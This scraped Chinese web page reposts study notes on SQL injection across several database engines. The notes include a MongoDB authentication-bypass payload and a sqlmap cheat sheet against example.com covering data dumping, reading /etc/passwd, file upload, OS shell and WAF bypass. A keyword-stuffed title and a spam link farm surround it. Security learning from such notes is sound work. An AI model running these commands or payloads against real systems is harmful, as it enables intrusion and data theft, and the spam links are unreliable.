当前位置: 首页 > wzjs >正文

建设网站过程视频好看的网站分享

建设网站过程视频,好看的网站分享,粉红色网站asp,好模版网站通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2 数据库类型 ACCESS 特性 没数据库用户 没数据库权限 没数据库查询参数 没有高权限注入说法 暴力猜解,借助字典得到数据 注入方式 联合注入 偏移注入 表名列名猜解不到 偏移注入 MySQL 低权限 常…
  • 通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
    • 数据库类型
      • ACCESS
        • 特性
          • 没数据库用户
          • 没数据库权限
          • 没数据库查询参数
          • 没有高权限注入说法
        • 暴力猜解,借助字典得到数据
        • 注入方式
          • 联合注入
          • 偏移注入
        • 表名列名猜解不到
          • 偏移注入
      • MySQL
        • 低权限
          • 常规注入
        • 高权限
          • 常规注入
          • 文件读取
            • load_file
          • 文件写入
            • into outfile
        • 权限原因&判断
          • 代码连接用户决定
          • 查询函数user()
          • 其他
            • database()
            • version()
            • @@version_compile_os
      • MSSQL
        • 低权限
          • 常规注入
        • 高权限
          • 常规注入
          • 文件读取
          • 文件读写
          • 命令执行
          • 注册表读取
        • 权限原因&判断
          • 代码连接用户决定
          • 查询函数-user()
          • 其他
            • db_name() 当前数据库名字
            • @@version 获取版本信息
            • @@SERVERNAME 获取服务器主机信息
      • postgreSQL
        • 低权限
          • 常规注入
        • 高权限
          • 参考:https://www.freebuf.com/sectool/2493721.html
          • 常规注入
          • 文件读取
          • 文件写入
        • 权限原因&判断
          • 代码连接用户决定
          • 查询函数current_user
          • 其他
            • version()
            • current_database()
      • db2
        • 特性:
          • 数据库结构复杂,表名和列名通常需要猜解。
          • 高权限用户可以通过 LOAD 和 CALL 执行系统命令。
        • 注入方式:
          • 联合注入:通过 UNION SELECT 获取数据。
          • 报错注入:通过 XMLQUERY 等函数触发报错。
        • 权限判断:
          • 使用 SELECT user FROM sysibm.sysdummy1 查询当前用户。
          • 使用 SELECT * FROM sysibm.sysversions 查询数据库版本。
      • sybase
        • Sybase 的基本特点
          • 支持标准的 SQL 语法。
          • 支持存储过程、触发器等高级功能。
          • 数据库结构包括数据库、表、视图、存储过程等。
        • 2. Sybase 的权限模型
          • 高权限用户(如 sa)可以执行系统命令、读写文件等操作。
          • 低权限用户只能访问特定的数据库对象。
          • Sybase 的权限分为数据库用户和角色。
      • oracle
        • 特性:
          • 数据库结构复杂,表名和列名通常需要猜解。
          • 高权限用户可以通过 UTL_FILE 读写文件。
        • 注入方式:
          • 联合注入:通过 UNION SELECT 获取数据。
          • 报错注入:通过 ctxsys.drithsx.sn 等函数触发报错。
        • 权限判断:
          • 使用 SELECT user FROM dual 查询当前用户。
          • 使用 SELECT * FROM v$version 查询数据库版本。
      • mangodb
        • 特性:
          • NoSQL 数据库,不支持传统 SQL 注入。
          • 可能存在 NoSQL 注入漏洞,通常通过 JSON 查询注入。
        • 注入方式:
          • 通过修改 JSON 查询条件,绕过身份验证或获取数据。
          • { "username": {"$ne": ""}, "password": {"$ne": ""} }
    • 注入神器
      • SQLMAP
        • 文档介绍 | sqlmap 用户手册
        • 常见参数
          • 1. 指定目标
            • --data:指定 POST 请求的数据。
              • sqlmap -u "http://example.com/login" --data="username=admin&password=123"
            • --cookie:指定 Cookie。
              • sqlmap -u "http://example.com/page?id=1" --cookie="sessionid=12345"
            • -u 或 --url:指定目标 URL。
              • sqlmap -u "http://example.com/page?id=1"
          • 2. 指定注入点
            • --skip:跳过某些参数的测试。
              • sqlmap -u "http://example.com/page?id=1&name=test" --skip="name"
            • -p:指定需要测试的参数。
              • sqlmap -u "http://example.com/page?id=1&name=test" -p "id"
          • 3. 指定数据库类型
            • --dbms:指定目标数据库类型(如 MySQL、Oracle、PostgreSQL 等)。
              • sqlmap -u "http://example.com/page?id=1" --dbms=MySQL
          • 4. 获取数据库信息
            • --current-db:获取当前数据库名称。
              • sqlmap -u "http://example.com/page?id=1" --current-db
            • --tables:枚举指定数据库的表。
              • sqlmap -u "http://example.com/page?id=1" -D database_name --tables
            • --dbs:枚举所有数据库。
              • sqlmap -u "http://example.com/page?id=1" --dbs
            • --columns:枚举指定表的列。
              • sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns
            • --dump:导出表数据。
              • sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
          • 5. 高级功能
            • --risk:设置风险等级(1-3,默认 1),风险越高,测试越激进。
              • sqlmap -u "http://example.com/page?id=1" --risk=2
            • --threads:设置并发线程数。
              • sqlmap -u "http://example.com/page?id=1" --threads=5
            • --batch:自动选择默认选项,无需用户交互。
              • sqlmap -u "http://example.com/page?id=1" --batch
            • --level:设置测试等级(1-5,默认 1),等级越高,测试越全面。
              • sqlmap -u "http://example.com/page?id=1" --level=3
          • 6. 文件加载
            • -l:从日志文件中加载目标。
              • sqlmap -l logfile.txt
            • -r:从文件中加载 HTTP 请求。
              • sqlmap -r request.txt
          • 7. 绕过 WAF/IDS
            • --tamper:使用脚本绕过 WAF(Web 应用防火墙)或 IDS(入侵检测系统)。
              • sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
          • 8. 其他常用参数
            • --sql-shell:获取 SQL 交互式 shell。
              • sqlmap -u "http://example.com/page?id=1" --sql-shell
            • --file-read:读取服务器上的文件。
              • sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
            • --file-write 和 --file-dest:上传文件到服务器。
              • sqlmap -u "http://example.com/page?id=1" --file-write="local_file" --file-dest="/remote/path"
            • --os-shell:尝试获取操作系统的 shell。
              • sqlmap -u "http://example.com/page?id=1" --os-shell
          • 示例 1:检测注入点
            • sqlmap -u "http://example.com/page?id=1"
          • 示例 2:枚举数据库
            • sqlmap -u "http://example.com/page?id=1" --dbs
          • 示例 3:导出表数据
            • sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
          • 示例 4:获取操作系统 shell
            • sqlmap -u "http://example.com/page?id=1" --os-shell
          • 示例 5:绕过 WAF
            • sqlmap -u "http://example.com/page?id=1" --tamper=space2comment --level=5 --risk=3

文章转载自:

http://GdocRlk3.jfjwz.cn
http://YKRwU6HT.jfjwz.cn
http://oDQfPg4o.jfjwz.cn
http://V434sjBK.jfjwz.cn
http://8vHTOMF2.jfjwz.cn
http://761Zv1XF.jfjwz.cn
http://ehXa7A0I.jfjwz.cn
http://NjDnfK0G.jfjwz.cn
http://j4uPXq57.jfjwz.cn
http://sjqd0ZOT.jfjwz.cn
http://LQgAAIMh.jfjwz.cn
http://1AZddWgJ.jfjwz.cn
http://o7i6vKPj.jfjwz.cn
http://Y6DsSmJz.jfjwz.cn
http://1JHmg5Ur.jfjwz.cn
http://r7rq6fGB.jfjwz.cn
http://PL2tVGEc.jfjwz.cn
http://EH2nZNrW.jfjwz.cn
http://0zFV4i1k.jfjwz.cn
http://bPVsxV1B.jfjwz.cn
http://d3lqt6Dg.jfjwz.cn
http://l0VdjJRf.jfjwz.cn
http://eWGnDyPf.jfjwz.cn
http://qSna5QIU.jfjwz.cn
http://9IpwALVw.jfjwz.cn
http://Lfrj82qO.jfjwz.cn
http://KzgcAGVf.jfjwz.cn
http://LZei6EoH.jfjwz.cn
http://Xsj1PbRE.jfjwz.cn
http://JLvrF2lG.jfjwz.cn
http://www.dtcms.com/wzjs/745220.html

相关文章:

  • 站长之家关键词挖掘推广服务公司
  • 网站建设实训方案类似于QQ空间的wordpress主题
  • 网站优化的前景2022年全球3月解封
  • php网站开发技巧免费友情链接网页
  • 概念产品设计网站什么网站框架
  • 股票做空网站历史上的今天 网站如何做
  • ps怎么排版规划设计网站昆山网站建设机构
  • 代理网站建设公司多用户开源商城
  • 如何做外贸网站做系统网站提醒有风险
  • 母婴产品网站模板如何制作短视频
  • 网上做任务网站创新的网站建设公司
  • 用照片做模板下载网站好中国反钓鱼网站联盟
  • 网站建设会计帐务处理2014网站设计风格
  • 英文搜索网站提升seo排名
  • 黑龙江做网站的公司企业运营管理师
  • 旅游网站开发研究背景招生推广渠道有哪些呢
  • 网站开发前端和后端哪个费时间建设网站规模与类别
  • 沈阳工程建设信息网站电气监理h5公众号开发
  • windows系统做ppt下载网站wordpress 加速
  • 现在市场网站建设怎么样做网站查询违章
  • 郑州h5网站建设价格音乐播放网站怎么做
  • 高校后勤网站建设存在的问题大连网站制作的
  • 做视频的网站那几个盈利了网站建设考试多选题
  • 网站设计手机wordpress 文章自定义排序
  • 海兴做网站微信后台网站开发知识体系
  • 阿里云空间部署网站吗指数平滑法
  • 没有网站做推广文字图片生成器
  • 开网站建设工作是如何丽水开发区建设局网站廉租房
  • jsp怎样做网站yandex俄语网站建设
  • android wap网站南宁网站建设哪里有